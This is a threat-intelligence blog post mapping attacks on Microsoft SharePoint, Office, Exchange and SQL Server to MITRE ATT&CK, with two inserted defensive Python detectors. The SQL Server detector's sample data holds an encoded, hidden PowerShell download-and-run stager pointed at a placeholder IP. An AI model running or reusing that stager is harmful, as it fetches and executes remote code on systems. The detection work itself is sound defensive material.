Optiv’s gTIC Prioritized Software and Services List + MITRE Tactics Part IV: Microsoft Software and Products

This blog post continues the Optiv Global Threat Intelligence Center’s (gTIC) Prioritized Software and Services List series. The list provides a high-level introduction to frequently exploited software, services, and protocols and their associated MITRE ATT&CK tactic mappings. The purpose of researching, identifying, and prioritizing potentially high-risk products (based on how attractive they are to adversaries and how frequently they are targeted) is to supplement and support enterprise risk management, incident response preparedness, intelligence collection, and threat research. Follow-up reports will cover adversaries, vulnerabilities, techniques, and real-world incidents (where applicable) for many of the software and services outlined in the original blog post in more detail.

 

This fourth blog post in the series will cover exploitation trends and vulnerabilities in Microsoft SharePoint, Office, Exchange, and SQL Server to support the gTIC’s inclusion of Microsoft products on our Prioritized Software and Services List.

 

 

Microsoft Products and MITRE Technique Mapping

Optiv’s gTIC has identified and categorized Microsoft SharePoint, Office, Exchange, and SQL Server as Critical Enterprise Software. As described in our initial “Prioritized Software and Services List,” products and software that fall under the category of “Critical Enterprise Software” are considered essential to business processes and continuity. These products enable internal and external system communications; web and application servers; and file and data hosting, management, storage, and sharing. Adversaries target these types of software and products for various actions, including accessing and exfiltrating data, gaining Initial Access with malware or phishing, scanning and exploitation of insecure web-facing instances, installing backdoors and web shells to achieve Persistence, enumerating user credentials and privileges, and mapping out other parts of the network.

 

Microsoft software includes some of the most widely used email, networking, and document processing products and servers present in enterprise environments. The elevated risk profile for applicable organizations is based on the ubiquity of Microsoft products, as well as the severity and notoriety of known vulnerabilities and real-world compromises. While multiple Microsoft products have a strong presence in corporate environments globally, some are more frequently reported on than others. Independent of report frequency, if your organization owns or uses SharePoint, Office, Exchange, SQL Server, or any other popular Microsoft product, prioritize accordingly.

 

Reports and observations show that adversaries leverage Microsoft products to navigate across at least eight (8) Tactics mapped to the MITRE ATT&CK framework. Specific MITRE ATT&CK Techniques for each of the observed tactics include the following:

 

TA0001 - Initial Access

T1190 – Exploit Public-Facing Application: Remote code execution (RCE) vulnerabilities in Microsoft Exchange and SharePoint have been exploited by cybercriminals to gain Initial Access. The ProxyLogon series of vulnerabilities in Microsoft Exchange was famously exploited in 2021 by Chinese APT groups like HAFNIUM as well as by Black Kingdom ransomware operators. Adversaries are also known to use open-source and publicly available hacking tools against exposed, vulnerable instances of SQL Server to install backdoors for further intrusion and Persistence.

 

T1566 – Phishing: Cybercriminals and APT groups leverage phishing emails with malicious Microsoft Office document and workbook attachments. These trojan malware files often result in the installation or download of keyloggers, credential stealers, or ransomware.

 

TA0002 – Execution

T1204 – User Execution: Phishing emails carrying malicious Microsoft Office files (e.g., Word, Excel), links to malicious Office files, or embedded malicious macros require user interaction (opening the file, clicking a hyperlink, or enabling macros) before they download additional binaries and second-stage malware. Keyloggers and commodity malware such as Agent Tesla, Emotet, and Formbook, as well as C2 implants, are often delivered this way. APT groups are still reported to exploit old Office vulnerabilities via phishing emails with malicious attachments.

 

T1059.001 – Command and Scripting Interpreter: PowerShell: The RE#TURGENCE cybercriminal campaign reported in January 2024 executed encoded PowerShell commands on compromised SQL Servers to download and execute additional malicious files and code from remote servers.

 

TA0003 – Persistence

T1505.003 – Server Software Component: Web Shell: After exploiting Microsoft SharePoint and Exchange server vulnerabilities, adversaries have deployed web shells to maintain Persistence and then used them to install and execute ransomware. APT groups have likewise used web shells dropped through SharePoint exploitation to keep a foothold in the network before later deploying destructive wiper malware.

 

TA0006 – Credential Access

T1110 – Brute Force: Malware campaigns are known to use native tools and command-line interfaces to brute-force administrator-level accounts and then add a ghost/backdoor user to Microsoft SQL Server.

 

TA0005 – Defense Evasion

T1562.001 – Impair Defenses: Disable or Modify Tools: Cybercriminals are known to install malware that remotely runs scripts to tamper with security settings in Microsoft Office.

 

TA0009 – Collection

T1114.002 – Email Collection - Remote: Cybercriminals have exploited vulnerabilities in Microsoft Exchange to gather emails, which were then sold or provided to other threat actors to parse through and hijack existing threads to deliver malware in separate campaigns.

 

T1114.003 – Email Collection: Email Forwarding Rule: Compromised Microsoft Exchange accounts or harvested user credentials are used in email thread hijacking and business email compromise (BEC) attacks. Qakbot campaigns were observed replying within existing email threads to send malware-laden emails to other internal users, furthering Lateral Movement.

 

T1213.002 – Data from Information Repositories - SharePoint: Reported state-sponsored APT operations suggest that Microsoft 365 administrator credentials were leveraged to change permissions and provide access to data residing in SharePoint. The LAPSUS$ group is also known to hunt through victims’ SharePoint instances for credentials.

 

T1056 – Input Capture: Malware has been installed to collect usernames and passwords of users logging into compromised Microsoft Exchange servers by monitoring clear text HTTP traffic and capturing the credentials from the webform data or HTTP headers. This particular procedure to achieve T1056 is not yet common and has been observed in limited instances/campaigns.

 

TA0010 - Exfiltration

T1567 – Exfiltration Over Web Service: Attackers have been observed communicating with their malware C2 servers using emails sent using the Microsoft Exchange Web Services (EWS) API to transfer data out as well as send commands remotely.

 

TA0040 - Impact

T1486 – Data Encrypted for Impact: Ransomware campaigns targeting improperly managed or vulnerable Microsoft Exchange and SQL Servers for Initial Access resulted in the destruction or encryption of system files across the network later into the attack cycle.

 

T1496 – Resource Hijacking: Web shells and coin miners are uploaded onto web-facing servers as a result of RCE vulnerabilities (e.g., Exchange, SharePoint).

 

The following chart shows the most popular and widely covered Microsoft products—Office, Exchange, SQL Server, and SharePoint—mapped to various MITRE Tactics. The chart also shows associated threats, including malware, adversaries, and popular vulnerabilities assessed to pose a high risk to organizations or that are known to be exploited by cyber adversaries over the last 24 months.

 

[Image: gtic_part4_img1.jpg]

Figure 1: Threat Actor Tactics Map

 

 

Vulnerabilities and Threats

Cyber adversaries are known to exploit vulnerabilities in Microsoft products to accomplish numerous objectives: delivering payloads and implants such as remote access trojans (RATs); gaining Initial Access for exploit kit activity; installing web shells, keyloggers, credential stealers, and ransomware; and establishing a foothold for botnets. Research and observed compromises involving Microsoft exploits also validate Optiv gTIC’s long-standing assessment that threat actors will continue to exploit old vulnerabilities (two years and older) in popular software and services because of their demonstrable, proven exploit success over time.

 

Aside from zero-day exploits, research shows that adversaries have scanned for and exploited critical vulnerabilities in Microsoft SharePoint, Office, Exchange, and SQL Server within 24 hours of disclosure. It is therefore highly time sensitive for enterprises to prioritize these Microsoft assets in their asset inventory and defense-in-depth program. Threat actors known to have exploited Microsoft products as part of their campaigns include the APT groups APT41 (aka BARIUM), APT34, HAFNIUM, and Sidewinder; the ransomware cartels LockBit, AvosLocker, Black Kingdom, and Alphv; and the cybercriminal and initial access broker groups FIN7 and Cobalt Group. This is Likely due to Microsoft products’ ubiquity across enterprise environments, their management of and access to data and accounts, and their internet-facing position (e.g., Exchange), making the critical vulnerabilities in these products a key target for Initial Access, Discovery, and Collection.

 

Remote Code Execution (RCE) and Local Privilege Escalation (LPE) vulnerabilities in Microsoft products are among the most critical classes of vulnerabilities. RCE allows attackers to execute code and upload arbitrary files; LPE allows them to elevate privileges to manipulate, add, or delete credentials and files and to reach sensitive directories and systems. The most popular attack vector for Initial Access remains phishing with malicious links or attachments. Some of the most popular Microsoft Office vulnerabilities from 2017 and 2018 continued to appear in exploitation attempts as recently as 2023, both in commodity malware incidents (e.g., AgentTesla, Formbook, FareIt/Pony, Emotet) and in lower-capability state-sponsored campaigns such as those attributed to the Indian APT group Sidewinder. CVE-2017-11882 and CVE-2017-0199 are two of the most infamous and popular vulnerabilities observed in these malware-laden phishing attempts; their continued success Likely reflects unpatched installations, including the pirated copies known to be used heavily in many countries. Additionally, remote access trojans (RATs) like Revenge RAT have been observed attempting to bypass defensive measures by weakening Office security settings, including disabling Protected View and enabling macros to allow code execution. This trend of exploiting older vulnerabilities (two years and older) in popular software is a standing gTIC assessment and will Likely persist over the next 12 months. A more recent Office example is the exploitation of the 2022 Follina arbitrary code execution vulnerability, CVE-2022-30190, observed in 2023 delivering the LokiBot commodity malware.
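As an added example (not code from the original post or from any of the reports it cites), the following Python check audits the Office settings that the Revenge RAT behavior above, and T1562.001 earlier in the post, tamper with. It parses a registry export in the text format that reg export writes and flags macro and Protected View settings that have been weakened. The export text is constructed for the example; the value names (VBAWarnings, AccessVBOM, DisableInternetFilesInPV, DisableAttachementsInPV, DisableUnsafeLocationsInPV) and their meanings are Microsoft's Office security policy values, and the 16.0 path assumes Office 2016 or later.

```python
import re

# Constructed registry export (not from the original post), in the text format
# "reg export" writes. It models a host where malware has enabled all macros,
# granted VBA object-model access, and switched off two Protected View sources
# for Word, while Excel keeps the default "disable with notification".
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security]
"VBAWarnings"=dword:00000001
"AccessVBOM"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\ProtectedView]
"DisableInternetFilesInPV"=dword:00000001
"DisableAttachementsInPV"=dword:00000001
"DisableUnsafeLocationsInPV"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security]
"VBAWarnings"=dword:00000002
"""

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})$')
# ...\Office\<version>\<App>\Security, optionally followed by \ProtectedView
APP_RE = re.compile(
    r"\\Office\\[\d.]+\\(?P<app>\w+)\\Security(?P<pv>\\ProtectedView)?$", re.IGNORECASE)

# VBAWarnings: 1 = enable all macros, 2 = disable with notification,
# 3 = disable except digitally signed, 4 = disable all without notification.
MACRO_LEVELS = {1: "enable all macros", 2: "disable with notification",
                3: "disable except digitally signed", 4: "disable all without notification"}

# Protected View sources, keyed by the DWORD that disables each (1 = disabled).
PV_SOURCES = {"DisableInternetFilesInPV": "files from the internet",
              "DisableAttachementsInPV": "Outlook attachments",  # Microsoft's own spelling
              "DisableUnsafeLocationsInPV": "unsafe locations"}


def parse_reg_export(text):
    """Return {(key_path, value_name): int} for every DWORD in a .reg export."""
    values = {}
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        m = DWORD_RE.match(line)
        if m and key is not None:
            values[(key, m.group("name"))] = int(m.group("hex"), 16)
    return values


def audit_office_security(values):
    """Flag per-application Office settings that weaken macro or Protected View
    protections; returns a list of finding dicts in registry order."""
    findings = []
    for (key, name), value in values.items():
        m = APP_RE.search(key)
        if not m:
            continue
        app, in_pv = m.group("app"), m.group("pv") is not None
        if not in_pv and name == "VBAWarnings" and value == 1:
            msg = f"macro security set to '{MACRO_LEVELS[value]}'"
        elif not in_pv and name == "AccessVBOM" and value == 1:
            msg = "trusted access to the VBA project object model enabled (lets code write macros)"
        elif in_pv and name in PV_SOURCES and value == 1:
            msg = f"Protected View disabled for {PV_SOURCES[name]}"
        else:
            continue
        findings.append({"app": app, "setting": name, "value": value, "message": msg})
    return findings


if __name__ == "__main__":
    for f in audit_office_security(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"[{f['app']}] {f['setting']}={f['value']}: {f['message']}")
```

On a live host the same check runs against the output of `reg export "HKCU\Software\Microsoft\Office" office.reg`; the per-user hive is the one malware running as the user can write, which is why the audit keys on HKCU rather than the policy keys under HKLM that an administrator would set.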

 

The advanced cybercriminal outfit attributed as FIN7 was among multiple threat groups previously reported to exploit a high-severity and popular RCE vulnerability in Microsoft SharePoint, CVE-2019-0604, to upload web shells or other malware to maintain Persistence once Initial Access (including through other non-Microsoft software exploitation) was achieved. This type of vulnerability, including those affecting Exchange, poses a much higher risk to on-premises instances than off-premises (cloud-hosted) versions.

 

Malware campaigns such as Maggie have also targeted Microsoft SQL Server for Privilege Escalation and Persistence. The Maggie backdoor was installed on vulnerable SQL Servers, after which commands were executed using the SqlScan tool to brute-force administrator-level accounts and add ghost/backdoor user accounts to the targeted instance. The RE#TURGENCE campaign, observed and reported in January 2024 and attributed to attackers of Turkish origin, also brute-forced credentials against SQL Servers to gain Initial Access. Once in, the attackers executed malicious PowerShell code (spawned from the sqlservr.exe process) to download additional malware onto the compromised servers.
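As an added example (not code from the original post or from the Maggie or RE#TURGENCE reports), the following Python script shows the two detections a defender would want for the SQL Server activity described above and under T1110 and T1059.001 earlier in the post: counting failed SQL logins per source address from SQL Server ERRORLOG lines to surface brute-forcing, and a process-creation check that flags cmd.exe or PowerShell spawned directly under sqlservr.exe and decodes any -EncodedCommand argument. The log lines and process events are constructed for the example; the stager URL and IP addresses are placeholders, and the parent/child rule assumes Sysmon-style fields (ParentImage, Image, CommandLine).

```python
import base64
import re
from collections import Counter

# Constructed SQL Server ERRORLOG excerpt (not from the original post). The
# "Login failed for user '...' ... [CLIENT: <ip>]" shape is what SQL Server
# writes for error 18456; the addresses are placeholders.
SAMPLE_ERRORLOG = """\
2024-01-10 03:14:07.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2024-01-10 03:14:07.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2024-01-10 03:14:07.52 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2024-01-10 03:14:07.70 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.45]
2024-01-10 03:14:08.01 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2024-01-10 03:14:09.44 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.45]
2024-01-10 03:20:11.02 Logon       Login failed for user 'CORP\\jdoe'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.4.17]
"""

LOGIN_RE = re.compile(
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']+)'.*\[CLIENT: (?P<ip>[^\]]+)\]")

# Placeholder stager (hypothetical URL), encoded the way PowerShell expects:
# base64 of the UTF-16LE command text.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/p.ps1')"
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16-le")).decode()

# Constructed Sysmon-style process-creation events. xp_cmdshell runs its
# command as a child of sqlservr.exe, so the first event is the shape a
# "download and run" left behind after a brute-forced login.
SAMPLE_PROCESS_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"cmd.exe /c powershell.exe -nop -w hidden -enc {ENCODED_STAGER}"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED_STAGER}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Common spellings of PowerShell's -EncodedCommand switch, followed by base64.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def brute_force_sources(errorlog, threshold=4):
    """Count failed logins per client IP. Returns (flagged, took_over): flagged is
    {ip: failures} at or above threshold; took_over is the subset of flagged IPs
    that also produced a successful login (the spray-then-success pattern)."""
    failures, successes = Counter(), set()
    for line in errorlog.splitlines():
        m = LOGIN_RE.search(line)
        if not m:
            continue
        if m.group("result") == "failed":
            failures[m.group("ip")] += 1
        else:
            successes.add(m.group("ip"))
    flagged = {ip: n for ip, n in failures.items() if n >= threshold}
    return flagged, {ip for ip in flagged if ip in successes}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def flag_sql_spawned_shells(events):
    """Flag shells spawned directly by sqlservr.exe and any encoded PowerShell."""
    findings = []
    for ev in events:
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        decoded = decode_encoded_command(ev["CommandLine"])
        reasons = []
        if parent == "sqlservr.exe" and image in SHELLS:
            reasons.append("shell spawned by sqlservr.exe")
        if decoded is not None:
            reasons.append("encoded PowerShell command")
        if reasons:
            findings.append({"image": image, "parent": parent,
                             "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    flagged, took_over = brute_force_sources(SAMPLE_ERRORLOG)
    print("brute-force sources:", flagged, "then succeeded:", took_over)
    for f in flag_sql_spawned_shells(SAMPLE_PROCESS_EVENTS):
        print(f["parent"], "->", f["image"], f["reasons"], f["decoded"])
```

The second process event (PowerShell under cmd.exe) is only caught by the encoded-command rule, which is the point of keeping both checks: without process-tree context the sqlservr.exe parent is one hop away, and an attacker who avoids -EncodedCommand is still caught by the parent rule. SQL Server only writes the failed-login lines when login auditing is enabled for failed logins (the default), so confirm that setting before relying on the first check.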

 

After gaining Initial Access via phishing with a malicious Microsoft Office file or via exploiting a vulnerable Exchange or SQL Server instance, popular adversary actions include deploying destructive malware (e.g., ransomware, wiper malware) for Impact and web shells for Persistence. In 2021, ransomware outfits like Black Kingdom and Chinese APT groups like HAFNIUM exploited a set of zero-day vulnerabilities in on-premises Exchange servers, later known as ProxyLogon (most notably CVE-2021-26855, chained with CVE-2021-27065), to deliver either ransomware or old, openly available web shells like China Chopper. In Spring 2023, an Iranian state-sponsored group, APT34, targeted Exchange to deliver the custom ExchangeLeech backdoor. This backdoor collected credentials of users logging into compromised Exchange servers by monitoring clear-text HTTP traffic and capturing the credentials from webform data or HTTP headers. During this campaign, APT34 also sent emails through the Exchange Web Services API to communicate with a malware command and control (C2) server, both for Exfiltration of data and for remote command delivery.

 

Cybercriminals have also exploited Microsoft Exchange vulnerabilities to harvest emails and credentials. They can then sell most of these stolen email files to other criminals to parse through before leveraging them for email thread hijack attacks. They execute these attacks by sending spoofed emails to recipients in existing threads to achieve Lateral Movement. Cybercriminals spread the Qakbot backdoor across networks in this manner.

 

While not the focus of this blog post, Optiv’s gTIC also recognizes other Microsoft products that threat actors are Likely to exploit. While we will cover browser products like Microsoft Edge and Internet Explorer in a separate report, it is evident that off-premises cloud and code repositories like Microsoft Azure and GitHub are becoming more popular as attack vectors for cyber adversaries.

 

The graphics below illustrate Optiv gTIC’s Threat Actor Metric™ calculated for selected cyber threat actors known to leverage Microsoft SharePoint, Office, Exchange, or SQL Server as part of their attacks (See Appendix: References for an explanation of the Threat Actor Metric).

 

[Image: gtic_part4_img2.png]

Figure 2: Threat Actor Metric Score for Alphv Ransomware
© 2023. Optiv Security Inc. All Rights Reserved.

 

[Image: gtic_part4_img3.png]

Figure 3: Threat Actor Metric for FIN7

 

[Image: gtic_part4_img4.png]

Figure 4: Threat Actor Metric for APT34

 

[Image: gtic_part4_img5.png]

Figure 5: Threat Actor Metric for Hafnium

 

 

Appendix

 

References
MITRE ATT&CK® is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community. More information about MITRE ATT&CK® can be found at attack.mitre.org. All information about MITRE ATT&CK belongs to The MITRE Corporation subject to the following copyright: © 2021 The MITRE Corporation. MITRE ATT&CK® is licensed under the Terms of Use located at https://attack.mitre.org/resources/terms-of-use/.

 

Optiv Threat Actor Metric – The Optiv Threat Actor Metric was developed by Optiv’s gTIC and is a multi-faceted, qualitative approach to determining a cyber adversary’s or campaign’s potential threat to an organization or industry. The metric considers known and assessed non-technical capabilities and intentions and is scored out of a total possible 100. Its purpose is to add a layer of depth to risk-based intelligence analysis and to support proactive and remediating recommendations by visualizing the non-technical, qualitative risk factors of adversaries and threat campaigns. It is similar in function to the United States Department of Defense’s CARVER targeting scale.

 

Link charts and graphs in this report were created by Optiv gTIC leveraging the ThreatQuotient® Investigations platform.

 

In addition to Optiv’s own Enterprise Incident Management team’s incident response engagements and analysis and other sensitive sources, the following references provided additional information for this blog post:

 

AT&T Cybersecurity, ‘Sharepoint vulnerability exploited in the wild’, 2020, https://cybersecurity.att.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild/

 

DCSO CyTec, ‘MSSQL, meet Maggie’, 2022, https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01

 

Fortinet, ‘JuicyPotato Hacking Tool Discovered on Compromised Web Servers’, 2021, https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/report-juicypotato-hacking-tool-discovered.pdf

 

Fortinet, ‘LokiBot Campaign Targets Microsoft Office Document Using Vulnerabilities and Macros’, 2023, https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros

 

Gatlan, Sergiu, ‘New PowerExchange malware backdoors Microsoft Exchange servers’, 2023, https://www.bleepingcomputer.com/news/security/new-powerexchange-malware-backdoors-microsoft-exchange-servers/

 

NSFocus, ‘Microsoft SQL Server Remote Code Execution Vulnerability (CVE-2020-0618) Threat Alert’, 2020, https://nsfocusglobal.com/microsoft-sql-server-remote-code-execution-vulnerability-cve-2020-0618-threat-alert/

 

O’Donnell-Welch, Lindsey, ‘Qakbot attack uses email threads hijacked from ProxyLogon compromises’, 2022, https://duo.com/decipher/qakbot-attack-uses-email-threads-hijacked-from-proxylogon-compromises

 

U.S. CISA, ‘Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology’, 2022, https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a

 

Zurier, Steve, ‘Microsoft SharePoint vulnerability and China Chopper web shell used in ransomware attacks’, 2021, https://www.scmagazine.com/news/malware/microsoft-sharepoint-vulnerability-and-china-chopper-web-shell-used-in-ransomware-attacks

 

 

Analytical Comments, Statements, and Best Practices

Most Likely Course of Action (MLCOA) – The expected and probable tactics, techniques, and actions carried out by a threat actor. COA statements are well established and accepted in estimative and predictive intelligence assessments.

 

Most Dangerous Course of Action (MDCOA) – Tactics, techniques, or actions carried out or taken by an adversary that result in a worst-case scenario outcome or impact, regardless of probability. COA statements are well established and accepted in estimative and predictive intelligence assessments.

 

Words of Estimated Probability – Optiv’s gTIC employs the use of both probability statements for likelihood of events or actions and confidence levels for analytic assessments and judgements. Probability statements and confidence statements are inherently subjective; however, the gTIC leverages professional experience and intelligence fundamentals to deliver reasonable and relevant statements and assessments. Probability statements and the degree of likelihood of an assessed event/incident are modeled after the Intelligence Community Directive (ICD) 203: Analytic Standards, published by the United States’ Office of the Director of National Intelligence (ODNI), and are as follows:

 

Almost No Chance (Remote): 01-05%
Very Unlikely (Highly Improbable): 05-20%
Unlikely (Improbable / Improbably): 20-45%
Roughly Even Chance (Roughly Even Odds): 45-55%
Likely (Probable / Probably): 55-80%
Very Likely (Highly Probable): 80-95%
Almost Certain(ly) (Nearly Certain): 95-99%

 

Confidence statements, as defined by the gTIC, apply to reliability and relevance of information reported and are as follows:

 

High Confidence – Optiv EIM definition: Information and/or intelligence is assessed to be of high reliability and value to drive operations and decisions. Factors: Established history, repeated observations and patterns, strong precedence to form professional assessment and prediction/extrapolation. Quantitative relevance: 75%+

Moderate Confidence – Optiv EIM definition: Information and/or intelligence is reasonable and warrants consideration, action, or response where applicable. Factors: Sporadic observations, limited historical references (too recent or too long of a gap to be considered “established”). Quantitative relevance: 45-65% (+/- 10%)

Low Confidence – Optiv EIM definition: Information and/or intelligence is unreliable or less relevant and provided as situational awareness. Factors: Lack of established history or observations, unreliable or circumstantial evidence. Quantitative relevance: < 35%

 

Per ICD 203 standards, confidence-level statements are not combined with probability and degree of likelihood terms proposed in the above chart.

Principal Consultant | Optiv
Aamil Karimi has over 16 years of experience in the practice of intelligence analysis and reporting in both the military (HUMINT and targeting) as well as in cybersecurity threat intelligence and risk management. His cybersecurity experience includes supporting incident response, threat research, and CISO teams in building and expanding the threat intelligence capabilities for Fortune 500 companies and managed security services providers (MSSPs). Aamil’s approach to cyber threat and risk intelligence stems from maintaining a focus on the fundamentals of relevance and timeliness for customers and incorporating a risk-based strategy to prioritize collection, analysis, and reporting efforts. This is accomplished by understanding and assessing the current state of each customers’ risk profile and identifying the most likely and most dangerous threats to support business preparedness and defensive actions. Prior to joining the cybersecurity field, Aamil spent six years in Afghanistan on both active duty and civilian deployments supporting HUMINT and targeting efforts for the US Army, US Air Force Office of Special Investigations, and US Special Operations Command in Principal and Subject Matter Expert (SME) capacities.

Optiv Security: Secure greatness.®

Optiv is the cyber advisory and solutions leader, delivering strategic and technical expertise to nearly 6,000 companies across every major industry. We partner with organizations to advise, deploy and operate complete cybersecurity programs from strategy and managed security services to risk, integration and technology solutions. With clients at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can. At Optiv, we manage cyber risk so you can secure your full potential. For more information, visit www.optiv.com.